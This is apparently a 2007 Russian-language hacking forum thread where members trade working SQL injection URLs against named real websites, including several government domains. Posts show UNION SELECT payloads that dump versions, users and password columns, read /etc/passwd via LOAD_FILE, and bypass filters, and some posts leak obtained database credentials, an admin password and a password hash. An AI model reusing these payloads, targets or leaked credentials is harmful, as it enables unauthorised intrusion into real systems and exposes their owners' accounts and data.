SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    Code:
    http://hells.timeserv.biz/cms/page_view.php?id=110+union+select+1,2,password,admin+from+settings/*
    version 4.1.21-standard
     
    #2861 Nazaret2005, 16 Aug 2007
    Last edited: 16 Aug 2007
    3 people like this.
  2. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    _http://www.hudaweb.com/movlit//autor.php?autor=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    
    Зы со скриптом подбор колонок стал намного быстрее...
    P.S. Скрипт можно взять тут: https://forum.antichat.ru/thread46849.html
    Удачных скулей!
     
  3. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    _http://www.elforat.net/autor.php?id=-1+union+select+1,2,3,4,5/*
    
    Code:
    http://www.bajazzoverlag.ch/autor.php?id=-1+union+select+1,2,3,4,5,6,7/*
    
    Code:
    _http://www.3darena.de/autor/php/autor.php?autor_id=-1+union+select+concat(user(),version())/*
    
     
    #2863 -=lebed=-, 16 Aug 2007
    Last edited: 16 Aug 2007
    2 people like this.
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    вэб-дизайн Студия 5d.ru :)
    Code:
    http://www.iq-design.ru/content.php?act=tehnolog&div=-6+union+select+1,version(),3,4+from+news/*
    Code:
    http://www.nikas-s.ru/gallery.php?tab=photo&dir=-3+union+select+1,2,3,version(),5,6/*
    Code:
    http://www.interstahl.ru/?act=news&id=-2+union+select+1,2,3,4,5,user()
    Code:
    http://www.countrytravel.ru/second.php?act=main&div=-2+union+select+1,2,version(),4,5/*
    Code:
    http://www.razvod.ru/man.php?id=-651+union+select+1,2,3,concat_ws(0x3a,name,version()),5,6,7,8,9+from+authors/*
    Code:
    http://www.albitec.ru/content.php?cat=news&id=-25+union+select+1,2,3,4,5,6,7,8/*
    Code:
    http://www.interfax-religion.ru/?act=dujour&div=-275+union+select+1,version(),3,4,5,6,7,8,9,10/*
    Code:
    http://www.hifitech.ru/?act=product&id=-2632+union+select+1/*
    Code:
    http://www.kiyama.ru/content.php?act=mnu&browse=node&id=-64+union+select+1,2,3,4,5,6,7,8/*
    Code:
    http://www.bladeserver.ru/?act=news&id=-7+union+select+1,2,3,4,char(60,98,114,62,60,98,62,65,52,97,116,45,114,117,108,101,122,122,122,122,60,47,98,62),6,7,8,9/* 

    ребята очень упорно плодят уязвимые сайты :)
     
    1 person likes this.
  5. t00th

    t00th Banned

    Joined:
    15 Jul 2007
    Messages:
    37
    Likes Received:
    15
    Reputations:
    6
    Моя первая SQL Инъекция :\
    Code:
    http://www.rapha.cc/index.php?page=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
     
    4 people like this.
  6. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    Sharelita !
     
    1 person likes this.
  7. DRoT1K

    DRoT1K New Member

    Joined:
    16 Aug 2007
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*
    http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
     
  8. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://wow.crpg.ru/article.php?sid=-1+union+select+database(),2,version(),4,5,6,7,user(),9,10,11,12/*
    дальше не пошло =(
     
  9. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    По моему тут надо таким способом, а иначе фильтрация работает...
    http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),5,6,7,8,9,10,11,12/*
    З.Ы. Но дальше тоже не пошло :(
     
    1 person likes this.
  10. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    Red_Red1 Calcutta

    -->
    вывода нет
    но вывод есть здесь:
    ибо crpg.ru и rolemancer.ru на одном сервере

    /ps/ антибоян http://antiboyansql.narod.ru/sql.txt

    ------------------------------------------------------------------------

    DRoT1K
    ->
    -----------------
    ->
    авторизация
     
    #2870 Серенький, 17 Aug 2007
    Last edited: 17 Aug 2007
    2 people like this.
  11. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    5.0.22-standard-log:new_walbase:walf_admin@localhost

    walf_admin:#walf!base
     
    _________________________
    #2871 halkfild, 17 Aug 2007
    Last edited: 17 Aug 2007
    1 person likes this.
  12. t00th

    t00th Banned

    Joined:
    15 Jul 2007
    Messages:
    37
    Likes Received:
    15
    Reputations:
    6
    Code:
    http://www.iltod.gov.mn/forum.php?cat=-1+union+select+1,2,USER(),4,5/*
    Code:
    http://www.sante.gouv.sn/actualites.php?id=1+union+select+1,2,3,4/*
    Code:
    http://www.muat.gouv.sn/projets.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,19/*
    Code:
    http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,USER(),4,5,6/*
     
  13. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,3,4,5,6,7,8,9%20from%20user/*
    Лови. Пароль (точнее хеш) показывает, а вот колонку логина не подобрал. И откуда эти пароли хз!
     
    1 person likes this.
  14. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    по формату похоже на MySQL5 хэш

    зы так оно и есь
    *4ACFE3202A5FF5CF467898FC58AAB1D615029441:admin
     
  15. t00th

    t00th Banned

    Joined:
    15 Jul 2007
    Messages:
    37
    Likes Received:
    15
    Reputations:
    6
    Code:
    http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,login,password,5,6+from+admin/*
    admin: passe
     
  16. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    Там все поля admin

    Я вычислил имя и фамилию (админ) + id (1) :D
     
    #2876 Nazaret2005, 18 Aug 2007
    Last edited: 18 Aug 2007
    1 person likes this.
  17. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat([$%$#$],char(58),pass),0x17),0x17)+from+user/*
    Я очень долго .... себе этим мозг, но первое поле подобрать не смог...
    Может у кого получится?
    З.Ы, вот ещё http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(pass,0x17),0x17)+from+adm/*
     
    #2877 Termin@L, 18 Aug 2007
    Last edited: 18 Aug 2007
    1 person likes this.
  18. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    тут многоуровневй запрос

    Code:
    http://www.mtas.ru/second.php?ID=-15+union+select+razdeli_name+from+razdeli/*
    вот так работает,)) смотрим текст ошибки ) надо терь подобрать таблицу юзеров ))
     
    #2878 geezer.code, 19 Aug 2007
    Last edited: 19 Aug 2007
    1 person likes this.
  19. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Для начала смотри АнтиБоян
    =\
     
  20. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    .gov:
    Code:
    http://teleslin.lbl.gov/mysql/parseRTML2.php?id=-77+union+select+version(),user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
    
     
    2 people like this.
Thread Status:
Not open for further replies.